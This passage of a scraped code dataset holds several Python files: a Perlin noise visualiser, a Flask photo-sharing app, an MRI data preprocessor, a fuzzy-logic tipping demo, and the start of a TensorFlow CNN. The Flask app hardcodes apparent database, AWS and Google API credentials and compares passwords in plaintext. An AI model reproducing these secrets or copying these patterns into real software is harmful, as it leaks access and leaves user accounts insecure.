'''\r\n Function that changes seed length\r\n '''\r\n if change == 1:\r\n self._seed_length *= 2\r\n self.generate_seed()\r\n else:\r\n if self._seed_length/2 > 1:\r\n self._seed_length /= 2\r\n self.generate_seed()\r\n\r\n def get_octave_count(self):\r\n '''\r\n Getter function that returns octave count\r\n '''\r\n 
return int(self._octave_count)\r\n\r\n def get_seed_length(self):\r\n '''\r\n Getter function that returns seed length\r\n '''\r\n return int(self._seed_length)\r\n\r\n def get_scaling_factor(self):\r\n '''\r\n Getter function that returns seed length\r\n '''\r\n return self._scaling_factor\r\n\r\n def generate_octaves(self):\r\n '''\r\n Function that generates all octaves\r\n '''\r\n self._generations = []\r\n total_octaves = int(math.log10(self.get_seed_length())/math.log10(2))\r\n scale_acc = 0\r\n scale = 1\r\n for i in range(total_octaves):\r\n scale_acc += 1/(self.get_scaling_factor()**i)\r\n\r\n # Create octaves\r\n for octave in range(total_octaves):\r\n current_gen = []\r\n pitch = int(self.get_seed_length() / 2**(octave))\r\n for x in range(self.get_seed_length()):\r\n sample1 = int(int((x / pitch)) * pitch)\r\n sample2 = int(int((sample1 + pitch)) % self.get_seed_length())\r\n\r\n pos = (x-sample1) / pitch\r\n sample = (1-pos) * \\\r\n self._seed[sample1] + pos * self._seed[sample2]\r\n\r\n noise = sample * scale\r\n if octave != 0:\r\n current_gen.append(self._generations[-1][x] + noise)\r\n else:\r\n current_gen.append(noise)\r\n self._generations.append(current_gen)\r\n scale /= self._scaling_factor\r\n\r\n # Scale between 0 and 1\r\n self._generations = [[i/scale_acc for i in octave]\r\n for octave in self._generations]\r\n\r\n def get_octaves(self):\r\n '''\r\n Getter function that returns generated octaves\r\n '''\r\n return self._generations\r\n\r\n\r\nclass App(object):\r\n '''\r\n Top-level GUI application for PerlinNoiseVisualiser app\r\n '''\r\n\r\n def __init__(self, master, width, height):\r\n '''\r\n Construct PerlinNoiseVisualiser app in root window\r\n\r\n Arguments:\r\n master {tk.Tk} -- Window to place the game into\r\n '''\r\n\r\n self._master = master\r\n self._canvas = tk.Canvas(self._master)\r\n self._canvas.pack()\r\n self._perlin_noise = PerlinNoise(self._master)\r\n self._view = view.AppView(\r\n self._canvas, width, height)\r\n 
self._view.pack()\r\n self._canvas.bind_all(\"\", self._callback)\r\n self._setup()\r\n\r\n def _setup(self):\r\n '''Function that sets up the display for a Perlin Noise object\r\n '''\r\n self._view.refresh_view(self._perlin_noise)\r\n\r\n def _callback(self, event):\r\n if event.keysym == \"space\":\r\n self._perlin_noise.generate_seed()\r\n self._refresh_seed()\r\n self._perlin_noise.generate_octaves()\r\n self._refresh_terrain()\r\n elif event.keysym == \"u\":\r\n if self._perlin_noise.change_octave_count(1):\r\n print(\"change 1\")\r\n self._view.refresh_octaves(\r\n self._perlin_noise.get_seed_length(), self._perlin_noise.get_octaves(), self._perlin_noise.get_octave_count(), 1)\r\n elif event.keysym == \"j\":\r\n if self._perlin_noise.change_octave_count(-1):\r\n print(\"change -1\")\r\n self._view.refresh_octaves(\r\n self._perlin_noise.get_seed_length(), self._perlin_noise.get_octaves(), self._perlin_noise.get_octave_count(), -1)\r\n elif event.keysym == \"i\":\r\n self._perlin_noise.change_seed_length(1)\r\n self._refresh_seed()\r\n self._perlin_noise.change_octave_count(1)\r\n self._perlin_noise.generate_octaves()\r\n self._refresh_terrain()\r\n elif event.keysym == \"k\":\r\n self._perlin_noise.change_seed_length(-1)\r\n self._refresh_seed()\r\n self._perlin_noise.change_octave_count(-1)\r\n self._perlin_noise.generate_octaves()\r\n self._refresh_terrain()\r\n elif event.keysym == \"o\":\r\n self._perlin_noise.change_scaling_factor(1)\r\n self._perlin_noise.generate_octaves()\r\n self._refresh_terrain()\r\n elif event.keysym == \"l\":\r\n self._perlin_noise.change_scaling_factor(-1)\r\n self._perlin_noise.generate_octaves()\r\n self._refresh_terrain()\r\n\r\n def _refresh_terrain(self):\r\n self._view.draw_terrain(\r\n self._perlin_noise.get_seed_length(), self._perlin_noise.get_octaves(), self._perlin_noise.get_octave_count())\r\n\r\n def _refresh_seed(self):\r\n self._view.draw_seed(\r\n self._perlin_noise.get_seed_length(), 
self._perlin_noise.get_seed())\r\n\r\n\r\ndef main():\r\n root = tk.Tk()\r\n root.config(bg=\"#ffe6f9\")\r\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\r\n root.state('zoomed')\r\n # root.attributes(\"-fullscreen\", True)\r\n app = App(root, w, h)\r\n root.title(\"PerlinNoiseVisualiser\")\r\n root.mainloop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"214067300","text":"# for heroku\nfrom os import environ\nimport os\nimport random\nimport boto3\ns3 = boto3.resource('s3')\n\nimport sqlite3 as lite\nimport sys\nimport datetime\n\nfrom sqlalchemy import *\n\nfrom flask import Flask\nfrom flask import render_template, flash, redirect, request\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.login import (LoginManager, login_required, \n\t\t\t\t\tlogin_user, logout_user, current_user)\n\napp = Flask(__name__)\n\nWTF_CSRF_ENABLED = True\napp.secret_key='u_can_do_this'\n\nDATABASE_URL= 'postgres://efixxfonhxlizq:lhU545yvD0cnjsU_1cNpexUosI@ec2-54-83-203-50.compute-1.amazonaws.com:5432/d6ab2sm5oatdeb'\n\n\nAWS_BUCKET_NAME = 'exposr-client'\nAWS_KEY_ID = 'AKIAIZMP2MTECH75C74A'\nAWS_SECRET_KEY = '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'\nAWS_BUCKET_NAME = 'memrix1'\nALLOWED_EXTENSIONS = set(['jpg', 'jpeg', 'gif', 'png']) \n\nGMAPS_API_KEY = \"AIzaSyDEgKQ8xiwb_MHBJXT6wL_t2p_mH1REWZ4\"\n\nfrom boto3.session import Session\nimport botocore\nimport botocore.session\n\nsession = Session(aws_access_key_id=AWS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_KEY,\n region_name='us-west-2')\n\ns3 = session.resource('s3')\ns3Client = session.client('s3')\nbucket = s3.Bucket('mybucket')\nexists = True\ntry:\n s3.meta.client.head_bucket(Bucket='mybucket')\n\nexcept botocore.exceptions.ClientError as e:\n # If a client error is thrown, then check that it was a 
404 error.\n # If it was a 404 error, then the bucket does not exist.\n error_code = int(e.response['Error']['Code'])\n if error_code == 404:\n exists = False\n\n# for getting image urls\n# session = botocore.session.get_session()\n# client = session.create_client('s3')\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n# IF it's heroku, try will work\ntry:\n\tapp.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_URL\n\tdb = SQLAlchemy(app)\n\tSQLALCHEMY_DATABASE_URI = 'HEROKU_POSTGRESQL_GOLD_URL'\n\n# Otherwise use SQLite locally\nexcept KeyError:\n\tapp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db/info.db'\n\tdb = SQLAlchemy(app)\n\tSQLALCHEMY_DATABASE_URI = 'sqlite:///db/info.db'\n\tprint(\"using sqlite\")\n\nprint( \"success in connect to db \")\n\n# login manager\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n@login_manager.user_loader\ndef load_user(userid):\n return User.query.get(userid)\n\nfrom models import *\nfrom forms import *\nfrom locations import *\n# tree = setup_locations()\n# print(tree)\n\n@app.route('/index', methods=[\"GET\", \"POST\"])\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef index():\n\t# render the forms\n\tregister_form= RegisterForm()\n\tlogin_form = LoginForm()\n\n\tif request.method=='POST':\n\t\t# registration\n\t\tif register_form.validate_on_submit():\n\n\t\t\tif len(register_form.password.data) < 8:\n\t\t\t\tflash('Password is not long enough')\n\t\t\t\treturn redirect('/')\n\n\t\t\tprint('register_form validated')\n\n\t\t\t# create a new user object\n\t\t\tuser = User(register_form.username.data, \n\t\t\t\t\t\tregister_form.email.data, \n\t\t\t\t\t\tregister_form.password.data)\n\n\t\t\texisting_user = User.query.filter_by(email=register_form.email.data).first() \n\t\t\tif existing_user:\n\t\t\t\tflash(\"This email has already been registered\")\n\t\t\t\treturn redirect( '/' )\n\n\t\t\texisting_user = 
User.query.filter_by(username=register_form.username.data).first()\n\t\t\tif existing_user:\n\t\t\t\tflash(\"This username has already been taken\")\n\t\t\t\treturn redirect( '/' )\n\n\t\t\t# add user to db\n\t\t\tdb.session.add(user)\n\t\t\tdb.session.commit()\n\t\t\t# login this new user\n\t\t\tlogin_user(user)\n\t\t\tflash(\"Successfully registered\")\n\t\t\tprint( \"logged in user\" )\n\t\t\treturn redirect('/')\n\n\t\t# logging in form validation\n\t\tif login_form.validate_on_submit():\n\n\t\t\tprint('Attempt login')\n\t\t\t#check for user in db\n\t\t\tuser = User.query.filter_by(email=login_form.email.data).first()\n\t\t\t\n\t\t\t# if the passwords match\n\t\t\tif (user and login_form.password.data == user.password):\n\t\t\t\t\n\t\t\t\t# login the user\n\t\t\t\tlogin_user(user)\n\t\t\t\tprint('logged in user: ')\n\t\t\t\tprint(current_user)\n\t\t\t\tflash(\"Successfully logged in\")\n\t\t\t\treturn redirect('/')\n\n\t\t\t# user is not in our db! turn him baaaakc\n\t\t\telif not user:\n\t\t\t\tflash('Wrong Email/Password Combination')\n\t\t\t\treturn redirect('/index')\n\t\t\n\t\tflash('All fields are required')\n\t\treturn redirect('/index')\n\n\t# Render default un-logged in session\n\tphotos = Photo.query.all()\n\n\tphotos_list = []\n\n\tfor photo in photos:\n\t\t# obj = s3.Object(bucket_name=AWS_BUCKET_NAME, key=photo.aws_key)\n\t\t# response = obj.get()\n\t\t# data = response['Body'].read()\n\n\t\turl = s3Client.generate_presigned_url('get_object', Params={'Bucket': AWS_BUCKET_NAME, 'Key':photo.aws_key}, ExpiresIn=3600)\n\t\t# print(photo.tags)\n\t\ttags = \" \".join(photo.tags.split(\", \"))\n\t\tprint(tags)\n\t\tphotos_list += [PhotoObj(photo, url, tags)]\n\n\treturn render_template('index.html',\n\t\t\t\t\t\t\ttitle='Hello',\n\t\t\t\t\t\t\tregister_form=register_form,\n\t\t\t\t\t\t\tlogin_form=login_form,\n\t\t\t\t\t\t\tcurrent_user=current_user,\n\t\t\t\t\t\t\tphotos=photos_list)\n\n\nclass PhotoObj():\n\n\tdef __init__(self, data, url, 
tags):\n\t\tself.data = data\n\t\tself.url = url\n\t\tself.tags = tags\n\n\tdef __repr__(self):\n\t\treturn PhotoObj.data.aws_key\n\n# @app.route('/profile', methods=['GET', 'POST'])\n# @login_required\n# def profile():\n\n# \tregister_form = RegisterForm()\n# \tlogin_form = LoginForm()\n# \t# likes = 0\n# \t# aliases = Alias.query.filter_by(user_id=current_user.id)\n# \t# for alias in aliases:\n# \t# \tlikes = likes + alias.points\n\n# \tuser_photos = Photo.query.filter_by(creator_id=current_user.id)\n# \tphotos_list = []\n# \tfor photo in user_photos:\n# \t\t# obj = s3.Object(bucket_name=AWS_BUCKET_NAME, key=photo.aws_key)\n# \t\t# response = obj.get()\n# \t\t# data = response['Body'].read()\n\n# \t\turl = s3Client.generate_presigned_url('get_object', Params={'Bucket': AWS_BUCKET_NAME, 'Key':photo.aws_key}, ExpiresIn=3600)\n# \t\tphotos_list += [PhotoObj(photo, url, tags)]\n\n# \treturn render_template( 'profile.html',\n# \t\t\t\t\t\t\t# likes=likes,\n# \t\t\t\t\t\t\ttitle=\"Profile\",\n# \t\t\t\t\t\t\tlogin_form=login_form,\n# \t\t\t\t\t\t\tregister_form=register_form,\n# \t\t\t\t\t\t\tcurrent_user=current_user,\n# \t\t\t\t\t\t\tphotos=photos_list)\n\n@app.route('/community', methods=['GET', 'POST'])\ndef community():\n\n\tregister_form = RegisterForm()\n\tlogin_form = LoginForm()\n\n\tuser_photos = Photo.query.all()\n\tphotos_list = []\n\tfor photo in user_photos:\n\t\turl = s3Client.generate_presigned_url('get_object', Params={'Bucket': AWS_BUCKET_NAME, 'Key':photo.aws_key}, ExpiresIn=3600)\n\t\ttags = \" \".join(photo.tags.split(\", \"))\t\t\n\t\tphotos_list += [PhotoObj(photo, url, tags)]\n\n\treturn render_template( 'community.html',\n\t\t\t\t\t\t\t# likes=likes,\n\t\t\t\t\t\t\ttitle=\"Community\",\n\t\t\t\t\t\t\tlogin_form=login_form,\n\t\t\t\t\t\t\tregister_form=register_form,\n\t\t\t\t\t\t\tcurrent_user=current_user,\n\t\t\t\t\t\t\tphotos=photos_list)\n\n@app.route('/user/')\ndef user(username, methods=['GET', 'POST']):\n\n\tregister_form= 
RegisterForm()\n\tlogin_form = LoginForm()\n\tuser = User.query.filter_by(username=username).first()\n\n\tif not user:\n\t\tflash(\"User not found\")\n\t\t# temporary redirect to homepage\n\t\treturn redirect('/')\n\n\tuser_photos = Photo.query.filter_by(creator_id=user.id)\n\n\tphotos_list = []\n\n\tfor photo in user_photos:\n\t\t# obj = s3.Object(bucket_name=AWS_BUCKET_NAME, key=photo.aws_key)\n\t\t# response = obj.get()\n\t\t# data = response['Body'].read()\n\n\t\turl = s3Client.generate_presigned_url('get_object', Params={'Bucket': AWS_BUCKET_NAME, 'Key':photo.aws_key}, ExpiresIn=3600)\n\t\ttags = \" \".join(photo.tags.split(\", \"))\n\t\tphotos_list += [PhotoObj(photo, url, tags)]\n\n\treturn render_template('user.html',\n\t\t\t\t\t\t\ttitle='Hello',\n\t\t\t\t\t\t\tregister_form=register_form,\n\t\t\t\t\t\t\tlogin_form=login_form,\n\t\t\t\t\t\t\tcurrent_user=current_user,\n\t\t\t\t\t\t\tuser=user,\n\t\t\t\t\t\t\tphotos=photos_list)\n\n# Generate individual photo pages\n@app.route('/photo/', methods=['GET', 'POST'])\ndef photo(photoname):\n\n\tregister_form= RegisterForm()\n\tlogin_form = LoginForm()\n\tphoto = Photo.query.filter_by(title=photoname).first()\n\tuser = User.query.filter_by(id=photo.creator_id).first()\n\turl = s3Client.generate_presigned_url('get_object', Params={'Bucket': AWS_BUCKET_NAME, 'Key':photo.aws_key}, ExpiresIn=3600)\n\n\tif photo:\n\t\treturn render_template( 'photo.html',\n\t\t\t\t\t\t\tregister_form=register_form,\n\t\t\t\t\t\t\tlogin_form=login_form,\n\t\t\t\t\t\t\tcurrent_user=current_user,\n\t\t\t\t\t\t\tuser=user,\n\t\t\t\t\t\t\tphoto=photo,\n\t\t\t\t\t\t\turl=url )\n\n\telse:\n\t\tflash('Photo not found')\n\t\treturn render_template( 'index.html' )\n\nphoto_just_added = False\n@app.route('/new', methods=['GET', 'POST'])\n@login_required\ndef new():\n\n\tglobal photo_just_added\n\n\tregister_form = RegisterForm()\n\tlogin_form = LoginForm()\n\tphoto_form = PhotoForm()\n\n\tif request.method == \"POST\":\n\n\t\tif not 
photo_form.validate_on_submit():\n\t\t\tflash(\"You might be missing some data fields!\")\n\t\t\treturn redirect(\"/new\")\n\n\t\tfile = request.files['file']\n\t\tif file and allowed_file(file.filename):\n\n\t\t\tfilename = file.filename\n\n\t\t\t# Add a random integer to the aws_key in case of multiple same-name uploads\n\t\t\taws_key = filename.split(\".\")[0] + str(random.randint(1, 10000)) + \".\" + filename.split(\".\")[1]\n\n\t\t\twhile Photo.query.filter_by(aws_key=aws_key).first():\n\t\t\t\taws_key = filename.split(\".\")[0] + str(random.randint(1, 10000)) + \".\" + filename.split(\".\")[1]\n\n\t\t\tprint(\"New aws key for this photo: \")\n\t\t\tprint(aws_key)\n\n\t\t\tphoto = Photo(\tcurrent_user,\n\t\t\t\t\t\t\tphoto_form.description.data,\n\t\t\t\t\t\t\tphoto_form.aperture.data,\n\t\t\t\t\t\t\tphoto_form.shutter_speed.data,\n\t\t\t\t\t\t\tphoto_form.focal_length.data,\n\t\t\t\t\t\t\tphoto_form.lens_focal_length.data,\n\t\t\t\t\t\t\tphoto_form.iso.data,\n\t\t\t\t\t\t\tphoto_form.camera_type.data,\n\t\t\t\t\t\t\tphoto_form.mode.data,\n\t\t\t\t\t\t\tphoto_form.title.data,\n\t\t\t\t\t\t\tphoto_form.date.data,\n\t\t\t\t\t\t\tphoto_form.location.data,\n\t\t\t\t\t\t\tphoto_form.tags.data,\n\t\t\t\t\t\t\taws_key \t)\n\n\n\t\t\ts3.Bucket(AWS_BUCKET_NAME).put_object(Key=aws_key, Body=file)\n\n\t\t\tflash(\"File successfully added\")\n\t\t\tprint(\"File successfully uploaded\")\n\n\t\t\tdb.session.add(photo)\n\t\t\tdb.session.commit()\n\n\t\t\tprint(\"Photo obj added to db\")\n\n\t\t\tphoto_just_added = True\n\t\t\treturn redirect('/')\n\n\t\telif not file or not allowed_file(file.filename):\n\t\t\tprint(\"File invalid\")\n\t\t\tflash('File is invalid')\n\n\n\t\tprint(\"Yes\")\n\t\treturn redirect('/')\n\t\t\n\t\tif photo_just_added:\n\t\t\tphoto_just_added = False\n\t\t\treturn redirect('/')\n\n\telse:\n\n\n\t\tif request.args.get('title'):\n\t\t\tprint(\"YES!\")\n\n\n\t\tif photo_just_added:\n\t\t\tphoto_just_added = False\n\t\t\treturn 
redirect('/')\n\n\t\treturn render_template('new.html', title=\"New\",\n\t\t\t\t\t\t\t\t\t\t\tcurrent_user=current_user,\n\t\t\t\t\t\t\t\t\t\t\tlogin_form=login_form,\n\t\t\t\t\t\t\t\t\t\t\tregister_form=register_form,\n\t\t\t\t\t\t\t\t\t\t\tphoto_form=photo_form )\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n flash(\"You are now logged out.\")\n return redirect('/')\n \n# deals with unauthorized page access\n@login_manager.unauthorized_handler\ndef unauthorized():\n # do stuff\n flash(\"You'll need to log in or sign up to access this content\")\n return redirect('/')\n\n# transactionUserDict = {}\n\n# @app.route('/vote', methods=['POST'])\n# @login_required\n# def vote():\n# \tif request.method == 'POST':\n# \t\tif request.form['transactionId']:\n# \t\t\ttransactionId = request.form['transactionId']\n# \t\t\tif transactionId not in transactionUserDict:\n# \t\t\t\ttransactionUserDict[transactionId] = []\n# \t\t\tif current_user in transactionUserDict[transactionId]:\n# \t\t\t\treturn 'nah'\n# \t\t\telse:\n# \t\t\t\ttransactionUserDict[transactionId].append(current_user)\n# \t\t\t\tcurrTransaction = Transaction.query.filter_by(id=int(transactionId)).first()\n# \t\t\t\tcurrTransaction.likes += 1\n# \t\t\t\tdb.session.commit()\n# \t\t\t\treturn 'lol nice'","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"252692274","text":"# coding: utf-8\n\n# import built-in modules\nimport os,pickle,random,gc\nimport hashlib\nimport traceback\n###########################\n\n# import third parties' modules\nimport tensorlayer as tl\nimport nibabel as nib\nimport numpy as np\n###########################\nimport config\n# import my modules\n\n###########################\nclass DataPreprocessor(object):\n \"\"\"\n DataPreprocessor class.\n @pythonVersion: 3.5.2\n @methods:\n __init__ Initiate data preprocessor instance.\n getAllData 
Get training data and test data. Define the ratio of training data\n and test data by set 'trainTestRate' parameter and 'dataSize' as size\n of data to use.\n @author: XZ.Liu\n @creation: 2018-03-18\n @modified: 2018-03-20\n @version: 0.1\n \"\"\"\n def __init__(self, imgsPath=config.IMAGE_PATH, segsPath=config.SEGS_PATH, saveDir=config.SAVE_DIR):\n try:\n self.__imgsPath = imgsPath\n self.__segsPath = segsPath\n self.__saveDir = saveDir\n if not os.path.exists(saveDir):\n os.makedirs(saveDir)\n except Exception as why:\n traceback.print_exc(why)\n\n def __checkDim(self,imgData):\n # check the shape of image\n if imgData.shape != (256,256,180):\n x_pad = (256-imgData.shape[0])//2\n y_pad = (256-imgData.shape[1])//2\n z_pad = (180-imgData.shape[2])//2\n imgData = np.pad(imgData, ((x_pad,x_pad),(y_pad,y_pad),(z_pad,z_pad)),'constant',constant_values=((-1,-1),(-1,-1),(-1,-1)))\n return imgData\n def __loadImg(self, left, right):\n \"\"\"\n Load the images' 3D data to a dict classfied by images' different dimensions.\n Returns :list: dataList object\n\n :param left: Left index of __imgsPath's image list to load.\n :param right: Right index of __imgsPath's image list to load.\n \"\"\"\n imgList = os.listdir(self.__imgsPath)[left:right]\n dataList = []\n # load image data by image shape\n for imgName in imgList:\n imgPath = self.__imgsPath + imgName\n img = nib.load(imgPath)\n imgData = img.get_data() #(256, 256, 166, 1)\n # get the first three dimension - 3D data\n imgData = imgData[:,:,:,0]\n imgData = self.__checkDim(imgData)\n # if the list of the specific dimension data already exists, we just append data to it.\n dataList.append(imgData)\n return dataList # shape [(256, 256, 180)]\n\n def __getNormalizeParam(self, dataList):\n \"\"\"\n Get the parameters we need to normalize the images' data.\n Returns :dict: dataMeanStdDict\n\n :param dataList: Data list to use for calculating the normalizing parameters.\n \"\"\"\n dataList = np.asarray(dataList)\n # calculate 
mean and std\n m = np.mean(dataList)\n s = np.std(dataList)\n dataMeanStdDict = {'mean': 0.0, 'std': 1.0}\n dataMeanStdDict['mean'] = m\n dataMeanStdDict['std'] = s\n return dataMeanStdDict\n\n def __save(self, object, name = 'mean_std_dict.pickle'):\n \"\"\" Save file to pickle. \"\"\"\n with open(self.__saveDir + name, 'wb') as f:\n pickle.dump(object, f, protocol=4)\n\n def __getData(self, imgList, dataMeanStdDict):\n \"\"\"\n Get normalized image data.\n Returns :tuple: X_input,X_target\n\n :param imgList: Image list used to normalize and construct the return tuple.\n :param dataMeanStdDict: Dict of image list's parameters for normalizing.\n \"\"\"\n X_input = []\n X_target = []\n for imgName in imgList:\n imgPath = self.__imgsPath + imgName\n imgData = nib.load(imgPath).get_data()\n imgData = imgData[:, :, :, 0]\n imgData = self.__checkDim(imgData)\n # dimIndex = str(hashlib.md5(str(imgData.shape).encode()).hexdigest())[:6]\n imgData = (imgData - dataMeanStdDict['mean']) / dataMeanStdDict['std']\n imgData = imgData.astype(np.float32)\n\n # default segentation image name is the same as image name\n segName = imgName\n segImgData = nib.load(self.__segsPath + segName).get_data()\n segImgData = segImgData[:,:,:,0]\n segImgData = self.__checkDim(segImgData)\n for j in range(imgData.shape[2]):\n tmpArray = imgData[:, :, j]\n tmpArray.astype(np.float32)\n X_input.append(tmpArray)\n seg2d = segImgData[:, :, j]\n seg2d.astype(int)\n X_target.append(seg2d)\n gc.collect()\n print(\"finished {}\".format(imgName))\n return X_input,X_target\n\n def getAllData(self,trainTestRate = 0.8, dataSize = 'small'):\n \"\"\"\n Get training data and testing data.\n Returns :tuple: X_trainInput,X_trainTarget,X_testInput,X_testTarget\n\n :param trainTestRate: The value of (training data / testing data)\n :param: dataSize: The size of images used. 
legal values are 'small' 'half' 'all'\n \"\"\"\n try:\n num = len(os.listdir(self.__imgsPath))\n if dataSize == 'small':\n dataSize = num // 10\n elif dataSize == 'half':\n dataSize = num // 2\n elif dataSize == 'all':\n dataSize = num\n else:\n raise ValueError('Illegal dataSize')\n except Exception as e:\n traceback.print_exc()\n finally:\n print('Using data size: {}'.format(dataSize))\n\n try:\n if int(trainTestRate) < 0 or int(trainTestRate) > 1:\n raise ValueError('Error trainTestRate')\n trainIndex = int(dataSize * trainTestRate)\n except ValueError as e:\n traceback.print_exc()\n finally:\n print('train index by {}'.format(trainIndex))\n\n trDataList = self.__loadImg(0, trainIndex)\n txDataList = self.__loadImg(trainIndex, dataSize)\n trDataMeanStdDict = self.__getNormalizeParam(trDataList)\n txDataMeanStdDict = self.__getNormalizeParam(txDataList)\n # self.__save(trDataMeanStdDict, name = 'tr_mean_std_dict.pickle')\n # self.__save(txDataMeanStdDict, name = 'tx_mean_std_dict.pickle')\n\n try:\n segList = os.listdir(self.__segsPath)[:dataSize - 1]\n imgList = os.listdir(self.__imgsPath)[:dataSize - 1]\n trImgList = imgList[:trainIndex]\n txImgList = imgList[trainIndex:]\n trSegList = segList[:trainIndex]\n txSegList = segList[trainIndex:]\n except Exception as e:\n traceback.print_exc()\n\n print('Getting training data...')\n X_trainInput,X_trainTarget = self.__getData(trImgList, trDataMeanStdDict)\n print('Getting testing data...')\n X_testInput,X_testTarget = self.__getData(txImgList, txDataMeanStdDict)\n\n # for i in X_trainInput:\n # print(i.shape)\n X_trainInput = np.asarray(X_trainInput, dtype='float32')\n X_trainTarget = np.asarray(X_trainTarget, dtype='float32')\n X_testInput = np.asarray(X_testInput)\n X_testTarget = np.asarray(X_testTarget)\n # print(X_trainInput.shape)\n # print(X_trainTarget.shape)\n # print(X_testInput.shape)\n # print(X_testTarget.shape)\n return X_trainInput,X_trainTarget,X_testInput,X_testTarget\n\nif __name__ == '__main__':\n 
print('import me plz :)')\n","sub_path":"DataFactory.py","file_name":"DataFactory.py","file_ext":"py","file_size_in_byte":7564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191692318","text":"import numpy as np\nfrom skfuzzy import control as ctrl\nfrom skfuzzy import membership as mf\nimport matplotlib.pyplot as plt\n\nservice = ctrl.Antecedent(np.arange(0, 11, 1), 'service')\nfood = ctrl.Antecedent(np.arange(0, 11, 1), 'food')\ntips = ctrl.Consequent(np.arange(0, 31, 1), 'tips')\n\n# service['poor'] = mf.trimf(service.universe, [0, 0, 5])\n# service['average'] = mf.trimf(service.universe, [0, 5, 10])\n# service['good'] = mf.trimf(service.universe, [5, 10, 10])\nservice['poor'] = mf.trimf(service.universe, [0, 0, 3])\nservice['average'] = mf.trimf(service.universe, [2, 5, 8])\nservice['good'] = mf.trimf(service.universe, [6, 10, 10])\n\nfood['poor'] = mf.trimf(food.universe, [0, 0, 5])\nfood['average'] = mf.trimf(food.universe, [0, 5, 10])\nfood['good'] = mf.trimf(food.universe, [5, 10, 10])\n\ntips['low'] = mf.trimf(tips.universe, [0, 0, 15])\ntips['medium'] = mf.trimf(tips.universe, [0, 15, 30])\ntips['high'] = mf.trimf(tips.universe, [15, 30, 30])\n\nrule1 = ctrl.Rule(service['poor'] & food['poor'], tips['low'])\nrule2 = ctrl.Rule(service['poor'] & food['average'], tips['low'])\nrule3 = ctrl.Rule(service['poor'] & food['good'], tips['medium'])\nrule4 = ctrl.Rule(service['average'] & food['poor'], tips['low'])\nrule5 = ctrl.Rule(service['average'] & food['average'], tips['medium'])\nrule6 = ctrl.Rule(service['average'] & food['good'], tips['high'])\nrule7 = ctrl.Rule(service['good'] & food['poor'], tips['medium'])\nrule8 = ctrl.Rule(service['good'] & food['average'], tips['high'])\nrule9 = ctrl.Rule(service['good'] & food['good'], tips['high'])\n\nrules = [rule1, rule2, rule3, rule4, rule5, rule6, rule7, rule8, rule9]\n\ntip_rec_ctrl = ctrl.ControlSystem(rules=rules)\n\ntip_rec = 
ctrl.ControlSystemSimulation(control_system=tip_rec_ctrl)\n\n# define the values for the inputs\ntip_rec.input['service'] = 4\ntip_rec.input['food'] = 9\n\n# compute the outputs\ntip_rec.compute()\n\n# print the output values\nprint(tip_rec.output)\n\n# to extract one of the outputs\nprint(tip_rec.output['tips'])\n\ntips.view(sim=tip_rec)\n\n# Plot\nplt.show()","sub_path":"Lab_07-Fuzzy_Logic/17032467_tipping_system.py","file_name":"17032467_tipping_system.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"624669524","text":"\"\"\"\nCreated by Joakim Sorensen\n2017008298\nMachine Learning 2017\nKyung Hee University\n\n\"\"\"\n\nimport tensorflow as tf\nfrom sklearn import metrics\n\n\"\"\"\nThe model for the CNN, built with tensorflow.\nCan be trained and tested with functions defined\nbelow.\n\"\"\"\nclass Model:\n\n\n\tdef __init__(self, sess, name, nb_classes):\n\t\tself.name = name\n\t\tself.sess = sess\n\t\tself.nb_classes = nb_classes\n\t\tself._build_net()\n\n\t\"\"\"\n\tBuilds the CNN according to the img_size.\n\tNew image size will need new values for the layers,\n\tchanging just the image size will return in exceptions.\n\t\"\"\"\n\tdef _build_net(self):\n\t\twith tf.variable_scope(self.name):\n\t\t\timg_size = 45 * 45 * 1\n\n\t\t\tself.X = tf.placeholder(tf.float32, [None, img_size])\n\t\t\tself.Y = tf.placeholder(tf.float32, [None, self.nb_classes])\n\n\t\t\t# define layers\n\t\t\tinput_layer = tf.reshape(self.X, [-1, 45, 45, 1])\n\t\t\twith tf.variable_scope('conv_pool_1'):\n\n\t\t\t\tconv1 = tf.layers.conv2d(inputs=input_layer, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfilters=81, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tkernel_size=[5, 5], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding='same', \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tactivation=tf.nn.relu)\n\n\t\t\t\tpool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[3, 3], strides=3)\n\n\t\t\t\ttf.summary.image('input1', 
